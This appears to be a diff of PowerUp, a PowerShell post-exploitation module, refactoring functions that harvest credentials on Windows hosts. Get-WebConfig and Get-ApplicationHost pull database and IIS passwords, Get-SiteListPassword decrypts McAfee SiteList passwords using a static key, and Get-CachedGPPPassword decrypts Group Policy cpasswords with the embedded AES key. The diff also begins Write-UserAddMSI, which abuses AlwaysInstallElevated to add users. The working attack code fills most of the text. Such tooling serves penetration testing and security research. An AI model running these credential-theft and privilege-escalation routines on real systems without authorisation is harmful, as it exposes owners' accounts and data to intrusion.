+        C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath |
         ForEach-Object {
 
             $CurrentVdir = $_
@@ -3071,7 +3840,7 @@ function Get-WebConfig {
             if ($_ -like "*%*") {
                 $EnvarName = "`$Env:"+$_.split("%")[1]
                 $EnvarValue = Invoke-Expression $EnvarName
-                $RestofPath = $_.split("%")[2]
+                $RestofPath = $_.split('%')[2]
                 $CurrentVdir  = $EnvarValue+$RestofPath
             }
 
@@ -3088,18 +3857,17 @@ function Get-WebConfig {
                 if ($ConfigFile.configuration.connectionStrings.add) {
 
                     # Foreach connection string add to data table
-                    $ConfigFile.configuration.connectionStrings.add| 
+                    $ConfigFile.configuration.connectionStrings.add|
                     ForEach-Object {
 
                         [String]$MyConString = $_.connectionString
-                        if($MyConString -like "*password*") {
-                            $ConfUser = $MyConString.Split("=")[3].Split(";")[0]
-                            $ConfPass = $MyConString.Split("=")[4].Split(";")[0]
-                            $ConfServ = $MyConString.Split("=")[1].Split(";")[0]
+                        if ($MyConString -like '*password*') {
+                            $ConfUser = $MyConString.Split('=')[3].Split(';')[0]
+                            $ConfPass = $MyConString.Split('=')[4].Split(';')[0]
+                            $ConfServ = $MyConString.Split('=')[1].Split(';')[0]
                             $ConfVdir = $CurrentVdir
-                            $ConfPath = $CurrentPath
-                            $ConfEnc = "No"
-                            $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ,$ConfVdir,$CurrentPath, $ConfEnc)
+                            $ConfEnc = 'No'
+                            $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ, $ConfVdir, $CurrentPath, $ConfEnc)
                         }
                     }
                 }
@@ -3112,7 +3880,7 @@ function Get-WebConfig {
                     if (Test-Path  ($AspnetRegiisPath.FullName)) {
 
                         # Setup path for temp web.config to the current user's temp dir
-                        $WebConfigPath = (Get-Item $Env:temp).FullName + "\web.config"
+                        $WebConfigPath = (Get-Item $Env:temp).FullName + '\web.config'
 
                         # Remove existing temp web.config
                         if (Test-Path  ($WebConfigPath)) {
@@ -3136,17 +3904,15 @@ function Get-WebConfig {
                             $TMPConfigFile.configuration.connectionStrings.add | ForEach-Object {
 
                                 [String]$MyConString = $_.connectionString
-                                if($MyConString -like "*password*") {
-                                    $ConfUser = $MyConString.Split("=")[3].Split(";")[0]
-                                    $ConfPass = $MyConString.Split("=")[4].Split(";")[0]
-                                    $ConfServ = $MyConString.Split("=")[1].Split(";")[0]
+                                if ($MyConString -like '*password*') {
+                                    $ConfUser = $MyConString.Split('=')[3].Split(';')[0]
+                                    $ConfPass = $MyConString.Split('=')[4].Split(';')[0]
+                                    $ConfServ = $MyConString.Split('=')[1].Split(';')[0]
                                     $ConfVdir = $CurrentVdir
-                                    $ConfPath = $CurrentPath
                                     $ConfEnc = 'Yes'
-                                    $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ,$ConfVdir,$CurrentPath, $ConfEnc)
+                                    $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ, $ConfVdir, $CurrentPath, $ConfEnc)
                                 }
                             }
-
                         }
                         else {
                             Write-Verbose "Decryption of $CurrentPath failed."
@@ -3162,9 +3928,9 @@ function Get-WebConfig {
         }
 
         # Check if any connection strings were found
-        if( $DataTable.rows.Count -gt 0 ) {
+        if ( $DataTable.rows.Count -gt 0 ) {
             # Display results in list view that can feed into the pipeline
-            $DataTable |  Sort-Object user,pass,dbserv,vdir,path,encr | Select-Object user,pass,dbserv,vdir,path,encr -Unique
+            $DataTable | Sort-Object user,pass,dbserv,vdir,path,encr | Select-Object user,pass,dbserv,vdir,path,encr -Unique
         }
         else {
             Write-Verbose 'No connection strings found.'
@@ -3175,79 +3941,96 @@ function Get-WebConfig {
         Write-Verbose 'Appcmd.exe does not exist in the default location.'
         $False
     }
-
     $ErrorActionPreference = $OrigError
 }
 
 
 function Get-ApplicationHost {
- <#
-    .SYNOPSIS
+<#
+.SYNOPSIS
+
+Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system.
+
+Author: Scott Sutherland  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
+
+This script will decrypt and recover application pool and virtual directory passwords
+from the applicationHost.config file on the system.  The output supports the
+pipeline which can be used to convert all of the results into a pretty table by piping
+to format-table.
+
+.EXAMPLE
+
+Return application pool and virtual directory passwords from the applicationHost.config on the system.
+
+Get-ApplicationHost
+
+user    : PoolUser1
+pass    : PoolParty1!
+type    : Application Pool
+vdir    : NA
+apppool : ApplicationPool1
+user    : PoolUser2
+pass    : PoolParty2!
+type    : Application Pool
+vdir    : NA
+apppool : ApplicationPool2
+user    : VdirUser1
+pass    : VdirPassword1!
+type    : Virtual Directory
+vdir    : site1/vdir1/
+apppool : NA
+user    : VdirUser2
+pass    : VdirPassword2!
+type    : Virtual Directory
+vdir    : site2/
+apppool : NA
+
+.EXAMPLE
+
+Return a list of cleartext and decrypted connect strings from web.config files.
+
+Get-ApplicationHost | Format-Table -Autosize
+
+user          pass               type              vdir         apppool
+----          ----               ----              ----         -------
+PoolUser1     PoolParty1!       Application Pool   NA           ApplicationPool1
+PoolUser2     PoolParty2!       Application Pool   NA           ApplicationPool2
+VdirUser1     VdirPassword1!    Virtual Directory  site1/vdir1/ NA
+VdirUser2     VdirPassword2!    Virtual Directory  site2/       NA
+
+.OUTPUTS
+
+System.Data.DataTable
 
-        This script will recover encrypted application pool and virtual directory passwords from the applicationHost.config on the system.
-
-    .DESCRIPTION
-
-        This script will decrypt and recover application pool and virtual directory passwords
-        from the applicationHost.config file on the system.  The output supports the
-        pipeline which can be used to convert all of the results into a pretty table by piping
-        to format-table.
-
-    .EXAMPLE
-
-        Return application pool and virtual directory passwords from the applicationHost.config on the system.
-
-        PS C:\> Get-ApplicationHost
-        user    : PoolUser1
-        pass    : PoolParty1!
-        type    : Application Pool
-        vdir    : NA
-        apppool : ApplicationPool1
-        user    : PoolUser2
-        pass    : PoolParty2!
-        type    : Application Pool
-        vdir    : NA
-        apppool : ApplicationPool2
-        user    : VdirUser1
-        pass    : VdirPassword1!
-        type    : Virtual Directory
-        vdir    : site1/vdir1/
-        apppool : NA
-        user    : VdirUser2
-        pass    : VdirPassword2!
-        type    : Virtual Directory
-        vdir    : site2/
-        apppool : NA
-
-    .EXAMPLE
-
-        Return a list of cleartext and decrypted connect strings from web.config files.
-
-        PS C:\> Get-ApplicationHost | Format-Table -Autosize
-
-        user          pass               type              vdir         apppool
-        ----          ----               ----              ----         -------
-        PoolUser1     PoolParty1!       Application Pool   NA           ApplicationPool1
-        PoolUser2     PoolParty2!       Application Pool   NA           ApplicationPool2
-        VdirUser1     VdirPassword1!    Virtual Directory  site1/vdir1/ NA
-        VdirUser2     VdirPassword2!    Virtual Directory  site2/       NA
-
-    .LINK
-
-        https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
-        http://www.netspi.com
-        http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
-        http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx
-
-    .NOTES
-
-        Author: Scott Sutherland - 2014, NetSPI
-        Version: Get-ApplicationHost v1.0
-        Comments: Should work on IIS 6 and Above
+System.Boolean
+
+.LINK
+
+https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
+http://www.netspi.com
+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx
+
+.NOTES
+
+Author: Scott Sutherland - 2014, NetSPI
+Version: Get-ApplicationHost v1.0
+Comments: Should work on IIS 6 and Above
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]
+    [OutputType('System.Data.DataTable')]
+    [OutputType('System.Boolean')]
+    [CmdletBinding()]
+    Param()
+
     $OrigError = $ErrorActionPreference
-    $ErrorActionPreference = "SilentlyContinue"
+    $ErrorActionPreference = 'SilentlyContinue'
 
     # Check if appcmd.exe exists
     if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
@@ -3255,11 +4038,11 @@ function Get-ApplicationHost {
         $DataTable = New-Object System.Data.DataTable
 
         # Create and name columns in the data table
-        $Null = $DataTable.Columns.Add("user")
-        $Null = $DataTable.Columns.Add("pass")
-        $Null = $DataTable.Columns.Add("type")
-        $Null = $DataTable.Columns.Add("vdir")
-        $Null = $DataTable.Columns.Add("apppool")
+        $Null = $DataTable.Columns.Add('user')
+        $Null = $DataTable.Columns.Add('pass')
+        $Null = $DataTable.Columns.Add('type')
+        $Null = $DataTable.Columns.Add('vdir')
+        $Null = $DataTable.Columns.Add('apppool')
 
         # Get list of application pools
         Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
@@ -3304,7 +4087,7 @@ function Get-ApplicationHost {
         }
 
         # Check if any passwords were found
-        if( $DataTable.rows.Count -gt 0 ) {
+        if ( $DataTable.rows.Count -gt 0 ) {
             # Display results in list view that can feed into the pipeline
             $DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
         }
@@ -3318,79 +4101,82 @@ function Get-ApplicationHost {
         Write-Verbose 'Appcmd.exe does not exist in the default location.'
         $False
     }
-
     $ErrorActionPreference = $OrigError
 }
 
 
 function Get-SiteListPassword {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
+Based on Jerome Nokin (@funoverip)'s Python solution (in links).
+
+Author: Jerome Nokin (@funoverip)  
+PowerShell Port: @harmj0y  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
+
+Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
+C:\Documents and Settings\, or C:\Users\. For any files found, the appropriate
+credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
+function that takes advantage of McAfee's static key encryption. Any decrypted credentials
+are output in custom objects. See links for more information.
+
+.PARAMETER Path
+
+Optional path to a SiteList.xml file or folder.
+
+.EXAMPLE
 
-        Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
-        Based on Jerome Nokin (@funoverip)'s Python solution (in links).
-
-        PowerSploit Function: Get-SiteListPassword
-        Original Author: Jerome Nokin (@funoverip)
-        PowerShell Port: @harmj0y
-        License: BSD 3-Clause
-        Required Dependencies: None
-        Optional Dependencies: None
-
-    .DESCRIPTION
-
-        Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
-        C:\Documents and Settings\, or C:\Users\. For any files found, the appropriate
-        credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
-        function that takes advantage of McAfee's static key encryption. Any decrypted credentials
-        are output in custom objects. See links for more information.
-
-    .PARAMETER Path
-
-        Optional path to a SiteList.xml file or folder.
-
-    .EXAMPLE
-
-        PS C:\> Get-SiteListPassword
-
-        EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
-        UserName    :
-        Path        : Products/CommonUpdater
-        Name        : McAfeeHttp
-        DecPassword : MyStrongPassword!
-        Enabled     : 1
-        DomainName  :
-        Server      : update.nai.com:80
-
-        EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
-        UserName    : McAfeeService
-        Path        : Repository$
-        Name        : Paris
-        DecPassword : MyStrongPassword!
-        Enabled     : 1
-        DomainName  : companydomain
-        Server      : paris001
-
-        EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
-        UserName    : McAfeeService
-        Path        : Repository$
-        Name        : Tokyo
-        DecPassword : MyStrongPassword!
-        Enabled     : 1
-        DomainName  : companydomain
-        Server      : tokyo000
-
-    .LINK
-
-        https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
-        https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
-        https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
-        https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf
+Get-SiteListPassword
+
+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+UserName    :
+Path        : Products/CommonUpdater
+Name        : McAfeeHttp
+DecPassword : MyStrongPassword!
+Enabled     : 1
+DomainName  :
+Server      : update.nai.com:80
+
+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+UserName    : McAfeeService
+Path        : Repository$
+Name        : Paris
+DecPassword : MyStrongPassword!
+Enabled     : 1
+DomainName  : companydomain
+Server      : paris001
+
+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+UserName    : McAfeeService
+Path        : Repository$
+Name        : Tokyo
+DecPassword : MyStrongPassword!
+Enabled     : 1
+DomainName  : companydomain
+Server      : tokyo000
+
+.OUTPUTS
+
+PowerUp.SiteListPassword
+
+.LINK
+
+https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
+https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
+https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
+https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.SiteListPassword')]
     [CmdletBinding()]
-    param(
-        [Parameter(Position=0, ValueFromPipeline=$True)]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
         [ValidateScript({Test-Path -Path $_ })]
         [String[]]
         $Path
@@ -3401,9 +4187,10 @@ function Get-SiteListPassword {
             # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
             # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
             # port by @harmj0y
+            [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
             [CmdletBinding()]
-            Param (
-                [Parameter(Mandatory=$True)]
+            Param(
+                [Parameter(Mandatory = $True)]
                 [String]
                 $B64Pass
             )
@@ -3437,7 +4224,7 @@ function Get-SiteListPassword {
 
             # ignore the padding for the result
             $Index = [Array]::IndexOf($Decrypted, [Byte]0)
-            if($Index -ne -1) {
+            if ($Index -ne -1) {
                 $DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)])
             }
             else {
@@ -3447,10 +4234,11 @@ function Get-SiteListPassword {
             New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass}
         }
 
-        function Local:Get-SitelistFields {
+        function Local:Get-SitelistField {
+            [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
             [CmdletBinding()]
-            Param (
-                [Parameter(Mandatory=$True)]
+            Param(
+                [Parameter(Mandatory = $True)]
                 [String]
                 $Path
             )
@@ -3458,23 +4246,23 @@ function Get-SiteListPassword {
             try {
                 [Xml]$SiteListXml = Get-Content -Path $Path
 
-                if($SiteListXml.InnerXml -Like "*password*") {
+                if ($SiteListXml.InnerXml -Like "*password*") {
                     Write-Verbose "Potential password in found in $Path"
 
                     $SiteListXml.SiteLists.SiteList.ChildNodes | Foreach-Object {
                         try {
                             $PasswordRaw = $_.Password.'#Text'
 
-                            if($_.Password.Encrypted -eq 1) {
+                            if ($_.Password.Encrypted -eq 1) {
                                 # decrypt the base64 password if it's marked as encrypted
-                                $DecPassword = if($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''}
+                                $DecPassword = if ($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''}
                             }
                             else {
                                 $DecPassword = $PasswordRaw
                             }
 
-                            $Server = if($_.ServerIP) { $_.ServerIP } else { $_.Server }
-                            $Path = if($_.ShareName) { $_.ShareName } else { $_.RelativePath }
+                            $Server = if ($_.ServerIP) { $_.ServerIP } else { $_.Server }
+                            $Path = if ($_.ShareName) { $_.ShareName } else { $_.RelativePath }
 
                             $ObjectProperties = @{
                                 'Name' = $_.Name;
@@ -3486,7 +4274,9 @@ function Get-SiteListPassword {
                                 'EncPassword' = $PasswordRaw;
                                 'DecPassword' = $DecPassword;
                             }
-                            New-Object -TypeName PSObject -Property $ObjectProperties
+                            $Out = New-Object -TypeName PSObject -Property $ObjectProperties
+                            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.SiteListPassword')
+                            $Out
                         }
                         catch {
                             Write-Verbose "Error parsing node : $_"
@@ -3501,7 +4291,7 @@ function Get-SiteListPassword {
     }
 
     PROCESS {
-        if($PSBoundParameters['Path']) {
+        if ($PSBoundParameters['Path']) {
             $XmlFilePaths = $Path
         }
         else {
@@ -3510,7 +4300,7 @@ function Get-SiteListPassword {
 
         $XmlFilePaths | Foreach-Object { Get-ChildItem -Path $_ -Recurse -Include 'SiteList.xml' -ErrorAction SilentlyContinue } | Where-Object { $_ } | Foreach-Object {
             Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'"
-            Get-SitelistFields -Path $_.Fullname
+            Get-SitelistField -Path $_.Fullname
         }
     }
 }
@@ -3518,63 +4308,63 @@ function Get-SiteListPassword {
 
 function Get-CachedGPPPassword {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and left in cached files on the host.
+Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and
+left in cached files on the host.
 
-        PowerSploit Function: Get-CachedGPPPassword
-        Author: Chris Campbell (@obscuresec), local cache mods by @harmj0y
-        License: BSD 3-Clause
-        Required Dependencies: None
-        Optional Dependencies: None
-     
-    .DESCRIPTION
+Author: Chris Campbell (@obscuresec)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-        Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and datasources.xml files and returns plaintext passwords.
+.DESCRIPTION
+
+Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and
+datasources.xml files and returns plaintext passwords.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-CachedGPPPassword
+Get-CachedGPPPassword
 
+NewName   : [BLANK]
+Changed   : {2013-04-25 18:36:07}
+Passwords : {Super!!!Password}
+UserNames : {SuperSecretBackdoor}
+File      : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7
+            C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr
+            oups.xml
 
-        NewName   : [BLANK]
-        Changed   : {2013-04-25 18:36:07}
-        Passwords : {Super!!!Password}
-        UserNames : {SuperSecretBackdoor}
-        File      : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7
-                    C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr
-                    oups.xml
+.LINK
 
-    .LINK
-        
-        http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
-        https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
-        https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
-        http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
-        http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
+http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
+https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
+http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
 #>
-    
+
     [CmdletBinding()]
     Param()
-    
+
     # Some XML issues between versions
     Set-StrictMode -Version 2
 
     # make sure the appropriate assemblies are loaded
     Add-Type -Assembly System.Security
     Add-Type -Assembly System.Core
-    
+
     # helper that decodes and decrypts password
     function local:Get-DecryptedCpassword {
+        [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
         [CmdletBinding()]
-        Param (
-            [string] $Cpassword 
+        Param(
+            [string] $Cpassword
         )
 
         try {
-            # Append appropriate padding based on string length  
+            # Append appropriate padding based on string length
             $Mod = ($Cpassword.length % 4)
-            
+
             switch ($Mod) {
                 '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
                 '2' {$Cpassword += ('=' * (4 - $Mod))}
@@ -3582,34 +4372,36 @@ function Get-CachedGPPPassword {
             }
 
             $Base64Decoded = [Convert]::FromBase64String($Cpassword)
-            
+
             # Create a new AES .NET Crypto Object
             $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
             [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                  0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
-            
+
             # Set IV to all nulls to prevent dynamic generation of IV value
-            $AesIV = New-Object Byte[]($AesObject.IV.Length) 
+            $AesIV = New-Object Byte[]($AesObject.IV.Length)
             $AesObject.IV = $AesIV
             $AesObject.Key = $AesKey
-            $DecryptorObject = $AesObject.CreateDecryptor() 
+            $DecryptorObject = $AesObject.CreateDecryptor()
             [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
-            
+
             return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
-        } 
-        
-        catch {Write-Error $Error[0]}
-    }  
-    
+        }
+
+        catch {
+            Write-Error $Error[0]
+        }
+    }
+
     # helper that parses fields from the found xml preference files
-    function local:Get-GPPInnerFields {
+    function local:Get-GPPInnerField {
+        [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
         [CmdletBinding()]
-        Param (
-            $File 
+        Param(
+            $File
         )
-    
+
         try {
-            
             $Filename = Split-Path $File -Leaf
             [XML] $Xml = Get-Content ($File)
 
@@ -3618,12 +4410,12 @@ function Get-CachedGPPPassword {
             $NewName = @()
             $Changed = @()
             $Password = @()
-    
+
             # check for password field
             if ($Xml.innerxml -like "*cpassword*"){
-            
+
                 Write-Verbose "Potential password in $File"
-                
+
                 switch ($Filename) {
                     'Groups.xml' {
                         $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
@@ -3631,78 +4423,78 @@ function Get-CachedGPPPassword {
                         $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                     }
-        
-                    'Services.xml' {  
+
+                    'Services.xml' {
                         $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                     }
-        
+
                     'Scheduledtasks.xml' {
                         $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                     }
-        
-                    'DataSources.xml' { 
+
+                    'DataSources.xml' {
                         $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}                          
+                        $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                     }
-                    
-                    'Printers.xml' { 
+
+                    'Printers.xml' {
                         $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                     }
-  
-                    'Drives.xml' { 
+
+                    'Drives.xml' {
                         $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} 
+                        $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                     }
                 }
            }
-                     
-           foreach ($Pass in $Cpassword) {
+
+           ForEach ($Pass in $Cpassword) {
                Write-Verbose "Decrypting $Pass"
                $DecryptedPassword = Get-DecryptedCpassword $Pass
                Write-Verbose "Decrypted a password of $DecryptedPassword"
                #append any new passwords to array
                $Password += , $DecryptedPassword
            }
-            
+
             # put [BLANK] in variables
             if (-not $Password) {$Password = '[BLANK]'}
             if (-not $UserName) {$UserName = '[BLANK]'}
             if (-not $Changed)  {$Changed = '[BLANK]'}
             if (-not $NewName)  {$NewName = '[BLANK]'}
-                  
+
             # Create custom object to output results
             $ObjectProperties = @{'Passwords' = $Password;
                                   'UserNames' = $UserName;
                                   'Changed' = $Changed;
                                   'NewName' = $NewName;
                                   'File' = $File}
-                
+
             $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
             Write-Verbose "The password is between {} and may be more than one value."
-            if ($ResultsObject) {Return $ResultsObject} 
+            if ($ResultsObject) { Return $ResultsObject }
         }
 
         catch {Write-Error $Error[0]}
     }
-    
+
     try {
         $AllUsers = $Env:ALLUSERSPROFILE
 
-        if($AllUsers -notmatch 'ProgramData') {
+        if ($AllUsers -notmatch 'ProgramData') {
             $AllUsers = "$AllUsers\Application Data"
         }
 
         # discover any locally cached GPP .xml files
         $XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue
-    
+
         if ( -not $XMlFiles ) {
             Write-Verbose 'No preference files found.'
         }
@@ -3710,32 +4502,56 @@ function Get-CachedGPPPassword {
             Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
 
             ForEach ($File in $XMLFiles) {
-                Get-GppInnerFields $File.Fullname
+                Get-GppInnerField $File.Fullname
             }
         }
     }
 
-    catch {Write-Error $Error[0]}
+    catch {
+        Write-Error $Error[0]
+    }
 }
 
 
 function Write-UserAddMSI {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Writes out a precompiled MSI installer that prompts for a user/group addition.
+This function can be used to abuse Get-RegistryAlwaysInstallElevated.
 
-        Writes out a precompiled MSI installer that prompts for a user/group addition.
-        This function can be used to abuse Get-RegistryAlwaysInstallElevated.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .EXAMPLE
+.DESCRIPTION
 
-        PS C:\> Write-UserAddMSI
+Writes out a precompiled MSI installer that prompts for a user/group addition.
+This function can be used to abuse Get-RegistryAlwaysInstallElevated.
+
+.EXAMPLE
 
-        Writes the user add MSI to the local directory.
+Write-UserAddMSI
+
+Writes the user add MSI to the local directory.
+
+.OUTPUTS
+
+PowerUp.UserAddMSI
 #>
 
-    $Path = 'UserAdd.msi'
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('ServiceProcess.UserAddMSI')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('ServiceName')]
+        [String]
+        [ValidateNotNullOrEmpty()]
+        $Path = 'UserAdd.msi'
+    )
 
